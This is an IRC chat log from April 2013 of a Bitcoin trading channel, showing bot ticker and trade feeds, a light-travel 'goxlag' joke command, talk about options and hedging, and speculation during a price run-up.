that is amazing Apr 03 02:03:30 i did not know about the au option Apr 03 02:03:39 its new Apr 03 02:04:01 sup mjr Apr 03 02:04:02 or at least recently upgraded Apr 03 02:04:08 chilling chilling Apr 03 02:04:11 word Apr 03 02:04:18 had some really good meetings today Apr 03 02:04:23 =D Apr 03 02:04:31 thats gold when you have management buy-in Apr 03 02:05:41 ahahaha nanotube Apr 03 02:07:03 mircea_popescu: :) Apr 03 02:07:04 [BTCTC] [S.DICE-PT] 5 @ 0.0048 = 0.024 BTC [+] Apr 03 02:07:39 mircea_popescu: i've got all the planets and other major solar system features all set out, too. Apr 03 02:08:29 i had no idea the sun is so fat Apr 03 02:08:36 that light takes 20 seconds to go through it. Apr 03 02:08:40 hope we won't reach Eris/Dysnomia someday Apr 03 02:08:47 are you sure on the math of that ? Apr 03 02:09:12 OMG Apr 03 02:09:15 hilarous Apr 03 02:09:32 light actually goes millions of years through it Apr 03 02:09:54 cuz it's so hot and dense in th emiddle Apr 03 02:10:00 takes about 8 minutes for light to make it to earth Apr 03 02:10:04 [BTCTC] [S.MPOE-PT] 6 @ 0.000698 = 0.0042 BTC [+] Apr 03 02:10:27 I have seen it over 1 AU Apr 03 02:11:47 [MPEX] [S.MPOE] 745 @ 0.00067888 = 0.5058 BTC [-] Apr 03 02:11:49 [MPEX] [S.MPOE] 1300 @ 0.00067413 = 0.8764 BTC [-] Apr 03 02:11:52 [MPEX] [S.MPOE] 5000 @ 0.00067362 = 3.3681 BTC [-] Apr 03 02:11:54 [MPEX] [S.MPOE] 1455 @ 0.00067351 = 0.98 BTC [-] Apr 03 02:13:13 mircea_popescu: heh actually, i should double check that. Apr 03 02:13:20 the sun is opaque to light. Photons do not traverse it below the photosphere... Apr 03 02:14:32 [BTCTC] [ASICMINER-PT] 1 @ 0.779 BTC [-] Apr 03 02:14:57 well in a vacuum :p Apr 03 02:16:03 what price should i set on bitstamp overnight? Apr 03 02:16:56 let's shoot for 117 Apr 03 02:17:44 lol Apr 03 02:18:02 long distance shooting Apr 03 02:18:18 nah Apr 03 02:18:20 http://jezus.si:81/render?target=bitcoin.*.transactions&height=500&width=1100&lineMode=connected Apr 03 02:18:25 if 15 holds on gox Apr 03 02:18:32 17 will go Apr 03 02:19:05 119.95 Apr 03 02:19:10 thefuck ppc @ 0.00094989 Apr 03 02:19:12 to sell? Apr 03 02:19:48 okay. i'll prolly go half 117, half 119.95 Apr 03 02:20:06 do like coinbase Apr 03 02:20:08 "at some price" Apr 03 02:20:16 well 116.97 Apr 03 02:20:43 but 117 is probably gone before I finish dinner Apr 03 02:25:44 so, cya tomorrow. at 120 :D Apr 03 02:27:52 [HAVELOCK] [VTX] 1 @ 0.5 BTC [-] Apr 03 02:30:53 [HAVELOCK] [HIM] 1 @ 2 BTC [-] Apr 03 02:33:12 pgp: hey there Apr 03 02:34:27 ;;ticker Apr 03 02:34:28 BTCUSD ticker | Best bid: 116.01001, Best ask: 116.10000, Bid-ask spread: 0.08999, Last trade: 116.10000, 24 hour volume: 79534.66768249, 24 hour low: 99.00000, 24 hour high: 116.40000, 24 hour vwap: 107.30148 Apr 03 02:39:51 [HAVELOCK] [VTX] 3 @ 0.5 = 1.5 BTC [-] Apr 03 02:42:37 ;;goxlag --au Apr 03 02:42:38 MtGox lag is 80.479728 seconds. During this time, light travels 0.161280473816 AU, which is closest to the distance between the Sun and edge of solar corona, 0.01 AU Apr 03 02:44:44 https://bitcointalk.org/index.php?topic=165350.0 Apr 03 02:44:45 yay Apr 03 02:46:45 ;;goxlag --au Apr 03 02:46:46 MtGox lag is 126.458688 seconds. During this time, light travels 0.25342179485 AU, which is closest to the distance between the Sun and Mercury, 0.39 AU Apr 03 02:46:52 [HAVELOCK] [VTX] 10 @ 0.45 = 4.5 BTC [-] Apr 03 02:47:53 [HAVELOCK] [VTX] 13 @ 0.44 = 5.72 BTC [-] Apr 03 02:48:59 !baselag Apr 03 02:49:01 6 weeks. Apr 03 02:49:11 what's that? Apr 03 02:53:04 thru 117 before my dinner order even showed up Apr 03 02:53:53 [HAVELOCK] [HIM] 3 @ 2 = 6 BTC [-] Apr 03 02:54:52 [HAVELOCK] [VTX] 1 @ 0.5 BTC [+] Apr 03 02:55:00 hrm Apr 03 02:55:13 Ukto: check how many shares of DMC are held in accounts that were never activated Apr 03 02:55:37 hm? Apr 03 02:55:40 you can see that you know Apr 03 02:55:43 I can? Apr 03 02:55:44 from the glbse page :) Apr 03 02:55:58 first off Apr 03 02:56:06 held shares in bf accounts + claim accounts = total issued Apr 03 02:56:37 which you are somehow a few over Apr 03 02:56:46 er nm Apr 03 02:56:47 you are under Apr 03 02:56:53 er, what glbse page? Apr 03 02:57:03 10,773 total issued between bf accounts and glbse claims of 11,579 max Apr 03 02:57:18 under issuer -> 'Manage GLBSE Claims' Apr 03 02:57:23 o.o Apr 03 02:58:04 glbse 4ever! Apr 03 02:58:10 lol Apr 03 02:58:11 i wanna tshirt like that Apr 03 02:58:26 Ukto: that number doesnt work because 10773 is the number of shares after Ive bought them back Apr 03 02:58:53 then whats wrong ? Apr 03 02:58:58 thats how many are left Apr 03 02:59:06 the 11,579 is the max your asset can have. Apr 03 02:59:12 Ukto: I want to know how many shares are in accounts that were never activated Apr 03 02:59:14 just a limit number Apr 03 02:59:21 according to that number ALL accounts were activated Apr 03 02:59:26 which I know is false Apr 03 02:59:29 theres no total field in the glbse page? Apr 03 02:59:31 thought i had one Apr 03 02:59:32 1 sec Apr 03 02:59:33 i will cehck Apr 03 03:00:15 the glbse lists unclaimed accounts Apr 03 03:00:34 [MPEX] [O.USD.P086T] 2 @ 0.05902249 = 0.118 BTC [-] Apr 03 03:00:46 er, the glbse page Apr 03 03:01:14 looks like 2,154 unclaimed shares Apr 03 03:03:00 [BTCTC] [ASICMINER-PT] 1 @ 0.7792 BTC [+] Apr 03 03:03:02 so out of 10,733 shares, 2,154 are unclaimed Apr 03 03:03:16 hrm I think Im going to make an announcement then Apr 03 03:03:23 oh boy here it comes! Apr 03 03:03:24 :P Apr 03 03:03:28 90 days to activate your account, or the shares will revert to DMC ownership Apr 03 03:03:40 yup, saw that commin :P Apr 03 03:03:42 scammer Apr 03 03:03:48 and that Apr 03 03:05:59 lol Apr 03 03:06:10 ;;ticker Apr 03 03:06:11 BTCUSD ticker | Best bid: 117.62000, Best ask: 117.63709, Bid-ask spread: 0.01709, Last trade: 117.62000, 24 hour volume: 81308.33585058, 24 hour low: 99.00000, 24 hour high: 118.36000, 24 hour vwap: 107.65591 Apr 03 03:06:27 ;;asks 119.9 Apr 03 03:06:28 There are currently 3243.7238 bitcoins offered at or under 119.9 USD, worth 386165.453059 USD in total. | Data vintage: 110.3662 seconds Apr 03 03:06:30 send an email out to everyone that hasn't claimed. Apr 03 03:06:43 simpe enough Apr 03 03:06:48 [simple] Apr 03 03:07:00 plz email me with how to claim some shares Apr 03 03:07:02 sounds fun Apr 03 03:07:13 [BTCTC] [S.BBET-PT] 1 @ 0.00176 BTC [+] Apr 03 03:07:14 $email Apr 03 03:07:16 ThickAsThieves: To sign up for this service, contact smickles. Cost will be 0.01 BTC. Apr 03 03:07:19 [BTCTC] [S.BBET-PT] 49 @ 0.00177 = 0.0867 BTC [+] Apr 03 03:07:29 as simple as creating 12 new accounts on varios websites Apr 03 03:07:57 and submitting a sperm sample to Ukto Apr 03 03:08:50 which is why Luke-Jr cannot claim, every sperm is sacred Apr 03 03:08:59 [BTCTC] [S.MPOE-PT] 25 @ 0.000698 = 0.0175 BTC [+] Apr 03 03:09:20 lol Apr 03 03:10:28 [BTCTC] [GSDPT] 3 @ 0.00394 = 0.0118 BTC [+] Apr 03 03:11:00 burnside: I send out an email every other week or so Apr 03 03:12:07 [MPEX] [S.MPOE] 5000 @ 0.00068135 = 3.4068 BTC [+] Apr 03 03:12:09 [MPEX] [S.MPOE] 6750 @ 0.00068136 = 4.5992 BTC [+] Apr 03 03:12:24 [BTCTC] [S.MPOE-PT] 1 @ 0.000698 BTC [+] Apr 03 03:13:18 [MPEX] [S.DICE] 400 @ 0.004 = 1.6 BTC [-] Apr 03 03:13:19 [MPEX] [S.DICE] 3 @ 0.004 = 0.012 BTC [-] Apr 03 03:13:20 [MPEX] [S.DICE] 811 @ 0.0036201 = 2.9359 BTC [-] Apr 03 03:13:21 [MPEX] [S.DICE] 2000 @ 0.00360001 = 7.2 BTC [-] Apr 03 03:13:32 [MPEX] [S.DICE] 1500 @ 0.00335565 = 5.0335 BTC [-] Apr 03 03:13:34 [MPEX] [S.DICE] 1000 @ 0.00320001 = 3.2 BTC [-] Apr 03 03:13:35 [MPEX] [S.DICE] 4286 @ 0.00310001 = 13.2866 BTC [-] Apr 03 03:21:47 [MPEX] [S.MPOE] 8250 @ 0.00068136 = 5.6212 BTC [+] Apr 03 03:21:49 [MPEX] [S.MPOE] 18250 @ 0.00068141 = 12.4357 BTC [+] Apr 03 03:27:30 [BTCTC] [BASIC-MINING] 1 @ 0.39 BTC [+] Apr 03 03:31:41 [MPEX] [S.MPOE] 3506 @ 0.00068141 = 2.389 BTC [+] Apr 03 03:38:38 [BTCTC] [ASICMINER-PT] 3 @ 0.7795 = 2.3385 BTC [+] Apr 03 03:38:41 [BTCTC] [ASICMINER-PT] 1 @ 0.7795 BTC [+] Apr 03 03:38:49 [BTCTC] [ASICMINER-PT] 28 @ 0.779997 = 21.8399 BTC [+] Apr 03 03:40:52 [HAVELOCK] [HIM] 7 @ 2 = 14 BTC [-] Apr 03 03:42:24 [BTCTC] [RSM] 4 @ 0.002999 = 0.012 BTC [+] Apr 03 03:44:59 you know what I find fucking hilarious? Apr 03 03:45:03 luke only has 4 shares. Apr 03 03:45:54 after all his whining... Apr 03 03:46:06 mircea_popescu: re: sun - the solar radius is about .005 AU, and the coronal edge is about 2 solar radii away from sun surface, according to my googling. so .01 AU for light to get from photosphere to coronal edge. Apr 03 03:46:31 i gueess im not up to speed on all the coronal edging Apr 03 03:47:18 heh well, it's not particularly well defined or particularly smooth... but it was a good enough number to use as the 'closest thing to the sun other than mercury :) Apr 03 03:47:29 because saying 'mercury' every time it's 0 would be silly. Apr 03 03:48:12 mercury is about 200 light-seconds away from the sun. Apr 03 03:48:26 well if "mthox lag < 200 seconds" = 0 Apr 03 03:48:28 we got problems Apr 03 03:49:09 hehe well, it does 'closest object'. and there's really nothing between coronal edge (.01 au) and mercury (.39 au) Apr 03 03:49:22 so until it gets to like .2 au, closest thing will be .01 Apr 03 03:49:58 there are random asteroids and stuff, but they are small enough that they don't even have real names. :P Apr 03 03:49:59 actually there's very good reason for the gap Apr 03 03:50:03 as in, accretion Apr 03 03:50:23 well, reason or no reason, fact remains, there are no intermediate 'points of interest' :) Apr 03 03:50:37 ye Apr 03 03:50:40 ;;goxlag --au Apr 03 03:50:40 MtGox lag is 46.972662 seconds. During this time, light travels 0.0941326887159 AU, which is closest to the distance between the Sun and edge of solar corona, 0.01 AU Apr 03 03:50:58 i guess we can all root for goxlag to get to mercury :) Apr 03 03:51:02 so basically instead of mercury all the time which is silly Apr 03 03:51:08 we get solar corona all the time which is silly Apr 03 03:51:13 this improvement! Apr 03 03:51:16 hehe less silly than mercury. Apr 03 03:51:47 [MPEX] [O.USD.C101T] 10 @ 0.26910162 = 2.691 BTC [+] Apr 03 03:52:21 $avg Apr 03 03:52:22 ThickAsThieves: 107.73 Apr 03 03:52:25 ;;ticker Apr 03 03:52:25 BTCUSD ticker | Best bid: 117.80001, Best ask: 117.84400, Bid-ask spread: 0.04399, Last trade: 117.84400, 24 hour volume: 82099.72128991, 24 hour low: 99.00000, 24 hour high: 118.36000, 24 hour vwap: 107.92214 Apr 03 03:52:31 ;;goxlag Apr 03 03:52:31 MtGox lag is 0 seconds. Apr 03 03:52:40 ! Apr 03 03:53:19 http://bitbet.us/bet/353/bitcoin-price-to-rise-above-1000/ Apr 03 03:53:25 that's an interesting one. Apr 03 03:53:48 if it does, i wont need to be making bitbets Apr 03 03:53:50 popescu Apr 03 03:53:54 thank you Apr 03 03:54:04 yw. Apr 03 03:54:05 what for ? Apr 03 03:54:59 you know Apr 03 03:55:23 burnside: I send out an email every other week or so >> awesome. that's about all you can do then. Apr 03 03:55:50 ;;ticker Apr 03 03:55:51 BTCUSD ticker | Best bid: 117.00000, Best ask: 117.59822, Bid-ask spread: 0.59822, Last trade: 117.00000, 24 hour volume: 82038.36838155, 24 hour low: 99.00000, 24 hour high: 118.36000, 24 hour vwap: 107.93612 Apr 03 03:56:22 http://bitbet.us/bet/356/a-third-competitor-company-to-bfl-and-avalon/ Isn't Asicminer already making plans? Apr 03 03:57:05 ya well plans. Apr 03 03:57:37 iirc they were making plans to have 12th online in january, still ain't happened. Apr 03 03:57:46 indeed Apr 03 04:02:46 ;;bc,stats Apr 03 04:02:48 Current Blocks: 229396 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 427 blocks | Next Difficulty In About: 2 days, 8 hours, and 0 seconds | Next Difficulty Estimate: 7752366.26707 | Estimated Percent Change: 15.77908 Apr 03 04:03:47 every time I think of buying more calls I look at them and say DAMN they are expensive Apr 03 04:04:40 has anyone done algorithmic trading on mtgox? Apr 03 04:06:11 [MPEX] [O.USD.C092T] 20 @ 0.32061935 = 6.4124 BTC [+] Apr 03 04:06:50 there is a fair amount of crazy around Apr 03 04:07:04 even solidcoin is going up Apr 03 04:07:10 O_o Apr 03 04:07:44 pp is up 550% since yesterday Apr 03 04:08:04 o_O Apr 03 04:08:33 https://apps.facebook.com/bitcoin-tx/ Apr 03 04:08:33 [MPEX] [O.USD.C119T] 35 @ 0.19090837 = 6.6818 BTC Apr 03 04:08:43 bitcoin tip app for facebook looks like its happening Apr 03 04:09:00 lol Apr 03 04:09:17 bitcoin is about to go VIRAL! Apr 03 04:09:29 we had those before Apr 03 04:09:36 and they all sucked Apr 03 04:09:44 also crpyto ppl on fb? right. Apr 03 04:15:32 I've seen a couple of disparate fb friends crapping on about bitcoin Apr 03 04:16:11 ive had like 1 person even Like/Comment on any of my bitcoin posts Apr 03 04:16:27 [MPEX] [O.USD.P200T] 335 @ 0.85561207 = 286.63 BTC [-] Apr 03 04:16:52 a few days ago, I said "When I started sharing news about bitcoin, it was worth $20. Today it is worth $93." Then I got responses. Apr 03 04:16:52 [HAVELOCK] [SDICE] 35 @ 0.40000001 = 14 BTC [+] Apr 03 04:16:53 [HAVELOCK] [SDICE] 48 @ 0.4 = 19.2 BTC [-] Apr 03 04:16:54 [HAVELOCK] [SDICE] 2 @ 0.398888 = 0.7978 BTC [-] Apr 03 04:16:55 [HAVELOCK] [SDICE] 3 @ 0.39879999 = 1.1964 BTC [-] Apr 03 04:16:56 [HAVELOCK] [SDICE] 1 @ 0.39879999 BTC [-] Apr 03 04:17:05 those puts got massacred. Apr 03 04:17:24 ah ohhhh Apr 03 04:17:37 it stopped working Apr 03 04:17:46 ;;ticker Apr 03 04:17:47 BTCUSD ticker | Best bid: 117.75001, Best ask: 118.00000, Bid-ask spread: 0.24999, Last trade: 118.00000, 24 hour volume: 81957.38870023, 24 hour low: 99.00000, 24 hour high: 118.36000, 24 hour vwap: 108.12679 Apr 03 04:18:23 ;;market --sell 10000 Apr 03 04:18:25 A market order to sell 10000 bitcoins right now would net 1097486.2139 USD and would take the last price down to 105.0000 USD, resulting in an average price of 109.7486 USD/BTC. | Data vintage: 0.0012 seconds Apr 03 04:18:31 ;;market --sell 15000 Apr 03 04:18:31 A market order to sell 15000 bitcoins right now would net 1608242.7036 USD and would take the last price down to 100.2146 USD, resulting in an average price of 107.2162 USD/BTC. | Data vintage: 6.0775 seconds Apr 03 04:18:39 ;;market --sell 25000 Apr 03 04:18:39 A market order to sell 25000 bitcoins right now would net 2577154.7109 USD and would take the last price down to 93.1000 USD, resulting in an average price of 103.0862 USD/BTC. | Data vintage: 13.9036 seconds Apr 03 04:18:59 needs a lotta bitcoins to fill those puts Apr 03 04:25:01 There's no "naked short selling" in BTC-land, is there? Apr 03 04:25:09 no Apr 03 04:25:14 theres no shorting at all Apr 03 04:25:22 you can either go long, or buy USD. Apr 03 04:25:41 Right, I should have spoken in terms of puts/calls. Apr 03 04:25:57 So if someone wants to bet on a down draft, they could buy puts. Apr 03 04:26:28 you could buy puts or write calls Apr 03 04:26:36 but you will have to cover the calls you write. Apr 03 04:27:08 Do I buy the puts with BTC? So even if the puts do well, they're just a hedge on my BTC losses? Apr 03 04:27:27 you buy the puts with btc yea Apr 03 04:27:57 not sure what you mean by just a hedge. Apr 03 04:28:27 Ah, imagine an extreme case of putting all your BTC into puts. Apr 03 04:28:34 I did that Apr 03 04:28:38 well 30% Apr 03 04:28:44 it was a major mistake Apr 03 04:28:49 unbalanced__ yea ? Apr 03 04:29:10 BTC goes down... the puts go up... but they're denominated in BTC. So it's a wash. Or at least the river meeting the ocean? Apr 03 04:29:19 its not a wash by any means Apr 03 04:29:39 you buy 1k puts struck at 100. these cost you .1 each, so you pay 100 btc Apr 03 04:29:50 price goes to 50. your puts are now worth 2k btc. you've made 20x Apr 03 04:29:54 oh its not a wash at all Apr 03 04:30:14 You can basically hedge your position Apr 03 04:30:19 in fiat terms Apr 03 04:30:25 by buying around 20% of your nut in puts Apr 03 04:30:27 or less Apr 03 04:30:37 yeah. if you go over that you're basically leveraging into a short. Apr 03 04:30:52 yeahe Apr 03 04:30:56 Thanx guise. Apr 03 04:31:23 Since I'm long BTC and crazy bullish, and aim to buy calls soon, I was just trying to suss out, how loaded would a whale have to be to turn this bull run around? Apr 03 04:31:27 [BTCTC] [S.BBET-PT] 1 @ 0.00177 BTC [+] Apr 03 04:31:45 a whale doesn't have any particular interest in fighting the tape. Apr 03 04:32:11 Exactly... I can't see who in BTC land would have any interest in seeing it go down. Apr 03 04:32:22 not exactly what i said. Apr 03 04:32:23 Other than maybe you as a call writer. Apr 03 04:33:02 ian bakewell! Apr 03 04:33:11 It's easy in stocks for dozens of hedge funds to beat a stock price into the ground to accumulate more, if naked short selling is allowed in those markets. Here it's a lot harder to rein in a bull run, no? Apr 03 04:33:20 [MPEX] [O.USD.C122T] 20 @ 0.18087035 = 3.6174 BTC Apr 03 04:34:02 i dunno, mtgox/cointards are doing a pretty darn good job of it Apr 03 04:34:50 BAKEWELL.... when good cointards go bad. Apr 03 04:34:56 anyway, im off. gl all. Apr 03 04:35:02 you too Apr 03 04:35:04 thanks **** BEGIN LOGGING AT Wed Apr 3 09:16:18 2013 Apr 03 09:16:18 ;;ticker Apr 03 09:16:19 BTCUSD ticker | Best bid: 127.00000, Best ask: 127.00003, Bid-ask spread: 0.00003, Last trade: 127.00000, 24 hour volume: 93833.30411689, 24 hour low: 100.15000, 24 hour high: 130.00000, 24 hour vwap: 113.90981 Apr 03 09:16:23 mornin! Apr 03 09:16:29 hai Apr 03 09:16:39 ;;goxlag Apr 03 09:16:39 MtGox lag is 0.537715 seconds. During this time, light travels 0.00107757483944 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). Apr 03 09:16:52 130 Apr 03 09:17:15 crazy. Apr 03 09:17:38 131 Apr 03 09:18:20 just like zooooooooom Apr 03 09:18:42 ;;asks 149 Apr 03 09:18:44 There are currently 6271.479 bitcoins offered at or under 149.0 USD, worth 865227.350584 USD in total. | Data vintage: 0.0010 seconds Apr 03 09:18:51 ;;asks 250 Apr 03 09:18:51 There are currently 19338.039 bitcoins offered at or under 250.0 USD, worth 3212573.62477 USD in total. | Data vintage: 7.0612 seconds Apr 03 09:18:52 ;;bids 0 Apr 03 09:18:52 There are currently 41029910 bitcoins demanded at or over 0.0 USD, worth 9741936.25613 USD in total. | Data vintage: 7.8355 seconds Apr 03 09:19:25 morning! yes, it's cause i'm selling some...price blows up immediately after :) Apr 03 09:19:35 https://twitter.com/Mircea_Popescu/status/319333218493005825 Apr 03 09:19:40 all i got to say Apr 03 09:20:50 afraid you'll have to eat a big loss again? Apr 03 09:20:55 is it possible for something to be oversold and overpriced? Apr 03 09:21:09 sexy background pic lol Apr 03 09:21:29 ThickAsThieves yes. Apr 03 09:21:46 whats that mean? Apr 03 09:21:48 taub not even. affraid we'll end up with a rehash of the runup to 30 Apr 03 09:21:52 for it to be both Apr 03 09:21:57 ThickAsThieves mania. Apr 03 09:22:04 well that's gonna happen eventually Apr 03 09:22:12 hah thats exactly the only word i could come up with earlier Apr 03 09:22:13 taub death is also going to happen eventually. Apr 03 09:22:13 [BTCTC] [ASICMINER-PT] 12 @ 0.779998 = 9.36 BTC [+] Apr 03 09:22:16 trends dont go on for forever usually Apr 03 09:22:32 this is basically the worst attack on bitcoin from the very people bitcoin is here to slaughter. Apr 03 09:22:37 even fiat flucutates against each otehr a ton Apr 03 09:22:46 the sheeple following trends are doing a "we follow baaa baaaa" number on bitcoin Apr 03 09:22:55 it's working so far ;/\ Apr 03 09:23:02 its on regular news now, not just online or tech news Apr 03 09:23:12 signs to get out prolly Apr 03 09:23:12 people dont care the price Apr 03 09:23:16 or watch for big reversals Apr 03 09:23:18 yeah. everyone and their grandma wants btc Apr 03 09:23:21 hold on to your hats Apr 03 09:23:41 if they are just buying in now, and amateurs, price is meaningless Apr 03 09:24:23 ;;goxlag Apr 03 09:24:24 MtGox lag is 219.524796 seconds. During this time, light travels 0.439925233262 AU. You could have sent a bitcoin from the Sun to Mercury (0.39 AU). Apr 03 09:25:10 [BTCTC] [BTC-BOND] 10 @ 0.009832 = 0.0983 BTC [-] Apr 03 09:25:20 [BTCTC] [BTC-BOND] 90 @ 0.009831 = 0.8848 BTC [-] Apr 03 09:25:54 $avg Apr 03 09:25:55 ThickAsThieves: 113.58 Apr 03 09:27:30 [BTCTC] [BTC-BOND] 691 @ 0.009831 = 6.7932 BTC [-] Apr 03 09:27:32 [BTCTC] [BTC-BOND] 109 @ 0.00983 = 1.0715 BTC [-] Apr 03 09:30:27 need sleep, nite Apr 03 09:30:28 taub yeah totally. Apr 03 09:30:51 tbh i thought 93 was gonna be the big one Apr 03 09:30:59 not quite there yet it seems Apr 03 09:33:02 [HAVELOCK] [KCIM] 1 @ 1.188 BTC [+] Apr 03 09:33:02 heh Apr 03 09:36:03 [HAVELOCK] [VTX] 7 @ 0.431 = 3.017 BTC [-] Apr 03 09:38:02 [HAVELOCK] [SDICE] 1 @ 0.33300001 BTC [-] Apr 03 09:38:03 [HAVELOCK] [SDICE] 9 @ 0.333 = 2.997 BTC [-] Apr 03 09:38:05 [HAVELOCK] [SDICE] 3 @ 0.322 = 0.966 BTC [-] Apr 03 09:38:05 [HAVELOCK] [SDICE] 1 @ 0.3200001 BTC [-] Apr 03 09:38:06 [HAVELOCK] [SDICE] 49 @ 0.32 = 15.68 BTC [-] Apr 03 09:42:01 [HAVELOCK] [VTX] 11 @ 0.431 = 4.741 BTC [-] Apr 03 09:42:12 [BTCTC] [ASICMINER-PT] 1 @ 0.779998 BTC [+] Apr 03 09:43:04 [BTCTC] [ASICMINER-PT] 1 @ 0.779998 BTC [+] Apr 03 09:44:25 we're gonna find out just how worthless USD really is Apr 03 09:45:47 [BTCTC] [BTC-BOND] 999 @ 0.00983 = 9.8202 BTC [-] Apr 03 09:46:02 [HAVELOCK] [VTX] 1 @ 0.479966 BTC [+] Apr 03 09:47:24 also, tits. Apr 03 09:47:26 (,)(,) Apr 03 09:47:43 haha. those are some crazy nipples j Apr 03 09:49:39 is there an FAQ for the options? Apr 03 09:52:15 bgupta, i put a cheatsheet here: https://www.bitcoinforum.com/coinbr-com/call-option-calculation/msg2445/#msg2445 Apr 03 09:53:51 and also https://bitcointalk.org/index.php?topic=67302.0 (but the opening of position is now done differently) Apr 03 09:54:05 bgupta, and a nice overview of all options available: https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdGxfRk5SS0hxT1lsVmdLdU1QY0RveGc#gid=6 Apr 03 09:54:36 140 lel Apr 03 09:54:43 hysteria Apr 03 09:55:19 are options for .1 btc? Apr 03 09:55:27 1 Apr 03 09:55:52 settled in bitcoins tho Apr 03 09:56:02 ;;ticker Apr 03 09:56:03 BTCUSD ticker | Best bid: 134.03707, Best ask: 136.50000, Bid-ask spread: 2.46293, Last trade: 136.50000, 24 hour volume: 99269.33772735, 24 hour low: 100.15000, 24 hour high: 136.75381, 24 hour vwap: 115.26807 Apr 03 09:56:14 are you fucking shitting me? Apr 03 09:56:25 whut Apr 03 09:57:12 so O.USD.C101T is call to buy at 101? why is the bid/ask range .19xxx-0.272xxx? Apr 03 09:57:23 oh good it wasnt at 140 then, the cli display shows it at 140 Apr 03 09:57:37 le wow. Apr 03 09:57:46 it was 140 Apr 03 09:57:51 yes. and the spread is generally because of the risk involved Apr 03 09:58:14 bgupta: just multiple it by the 24h price Apr 03 09:58:22 ;;24hp Apr 03 09:58:22 Error: "24hp" is not a valid command. Apr 03 09:58:25 $avg Apr 03 09:58:26 jurov: 114.54 Apr 03 09:58:26 whatever the command is Apr 03 09:58:33 ^that Apr 03 09:58:34 :) Apr 03 09:58:37 Ah % price Apr 03 10:01:25 a lot of these don't have a bid or an ask. Apr 03 10:01:37 ;;asks 1000 Apr 03 10:01:37 There are currently 27760.159 bitcoins offered at or under 1000.0 USD, worth 8382539.9052 USD in total. | Data vintage: 67.0005 seconds Apr 03 10:02:34 ;;asks 250 Apr 03 10:02:36 There are currently 17686.764 bitcoins offered at or under 250.0 USD, worth 3057767.60599 USD in total. | Data vintage: 0.0007 seconds Apr 03 10:03:28 ah there we go, a refresh later and everything has bids and asks Apr 03 10:07:22 bgupta, it's the MPOE bot, sometimes it leaves for a while Apr 03 10:07:33 smoking pause or whatever Apr 03 10:07:40 heh ok. Apr 03 10:07:59 [BTCTC] [ASICMINER-PT] 2 @ 0.779998 = 1.56 BTC [+] Apr 03 10:08:01 I find it odd that the counterparty is a bot. Apr 03 10:08:18 however, I believe I understand why.. Apr 03 10:08:45 need a market maker, to facilitate trade, and there aren't enough humans writing options Apr 03 10:10:08 N vs T? Apr 03 10:11:53 CurrenT, Next? Apr 03 10:12:14 (month) Apr 03 10:12:44 yes Apr 03 10:17:42 everybody : please promote http://trilema.com/2013/people-bitcoin-is-not-worth-100-dollars-per-stop-buying/ on whatever social media etc. Apr 03 10:17:54 i know it's a bitter pill, but seriously... we'll end up fucked. Apr 03 10:24:31 but you were talking about only $100 btc :P Apr 03 10:24:33 http://www.reddit.com/r/Bitcoin/comments/1bkpvy/people_bitcoin_is_not_worth_100_dollars_per_stop/ Apr 03 10:24:39 NOW it's different Apr 03 10:25:08 https://dl.dropbox.com/u/6911896/topfishin.png maybe something cute Apr 03 10:25:15 fdas ya well... Apr 03 10:25:17 but not even satoshi can stop it this time Apr 03 10:25:23 jurov i guess not. Apr 03 10:25:30 can't sit and not say anything. Apr 03 10:25:43 "all it takes for stupidity to succeed" and all that. Apr 03 10:26:14 yes. and mpex deposits, please :) Apr 03 10:26:58 a yes Apr 03 10:27:56 [BTCTC] [ASICMINER-PT] 49 @ 0.779998 = 38.2199 BTC [+] Apr 03 10:29:52 and flushed. Apr 03 10:34:03 lol hide my pc appspot ? Apr 03 10:36:05 [MPEX] [O.USD.C110T] 100 @ 0.26204127 = 26.2041 BTC [+] Apr 03 10:36:37 sry that's proxy i use to read trilema Apr 03 10:36:41 http://www.reddit.com/r/Bitcoin/comments/1bkq2p/people_bitcoin_is_not_worth_100_dollars_per_stop/ Apr 03 10:36:46 fixed Apr 03 10:37:16 [MPEX] [O.USD.C125T] 100 @ 0.1998944 = 19.9894 BTC [+] Apr 03 10:38:01 mircea_popescu: yeah its $150 per Apr 03 10:38:10 yes well... Apr 03 10:38:10 asks are getting made love to Apr 03 10:38:24 [MPEX] [O.USD.C155T] 400 @ 0.11821909 = 47.2876 BTC Apr 03 10:42:57 Judging by that momentum it's going to pop sooner than later Apr 03 10:43:11 yea... Apr 03 10:43:25 and my coins are in limbo between btce and mtgox Apr 03 10:43:27 :[ Apr 03 10:44:29 I already made 500% profit and am all out watching for it to crash Apr 03 10:44:41 haha Apr 03 10:44:50 Could've been more, but I'm not a gambling man Apr 03 10:44:57 all those people that had to get verified and wathced it soar the last week Apr 03 10:45:02 are now desperate Apr 03 10:45:32 250>1350ish€ seems great, no? Apr 03 10:46:12 Which will make some sweet dividends once I put it into BTC-securities in a more rational market Apr 03 10:47:38 1350 coins? Apr 03 10:49:01 Sadly not, euros as in € Apr 03 10:51:54 why not focus on accumilating coins Apr 03 10:52:26 so, buy back in after crash ;) Apr 03 10:52:37 what if we go to 200 today, then we're def fucking goin down hard Apr 03 10:52:37 Was my main plan Apr 03 10:52:38 [MPEX] [O.USD.C185T] 95 @ 0.07377055 = 7.0082 BTC Apr 03 10:53:06 but we prolly reached at top, right here Apr 03 10:53:13 i wish i could sell right now Apr 03 10:53:16 ;;ticker Apr 03 10:53:17 BTCUSD ticker | Best bid: 141.00001, Best ask: 141.98998, Bid-ask spread: 0.98997, Last trade: 141.10100, 24 hour volume: 107422.54894605, 24 hour low: 102.00000, 24 hour high: 143.90000, 24 hour vwap: 117.47279 Apr 03 10:53:40 150 might be psychologically significant enough Apr 03 10:53:53 Could crah anytime though, last one popped at 31-33ish Apr 03 10:54:06 yup Apr 03 10:55:23 What's more interesting is where it will go to after crashing, 10ish seems too low Apr 03 10:55:29 ;;asks 150 Apr 03 10:55:30 There are currently 5545.1177 bitcoins offered at or under 150.0 USD, worth 819419.244866 USD in total. | Data vintage: 81.4224 seconds Apr 03 10:55:53 100-50 Apr 03 10:55:56 my guess Apr 03 10:56:03 dont think we will go below 50 anytime soon Apr 03 11:03:02 [HAVELOCK] [SDICE] 10 @ 0.321 = 3.21 BTC [+] Apr 03 11:04:02 [HAVELOCK] [SDICE] 1 @ 0.32 BTC [-] Apr 03 11:05:02 [HAVELOCK] [SDICE] 1 @ 0.3180994 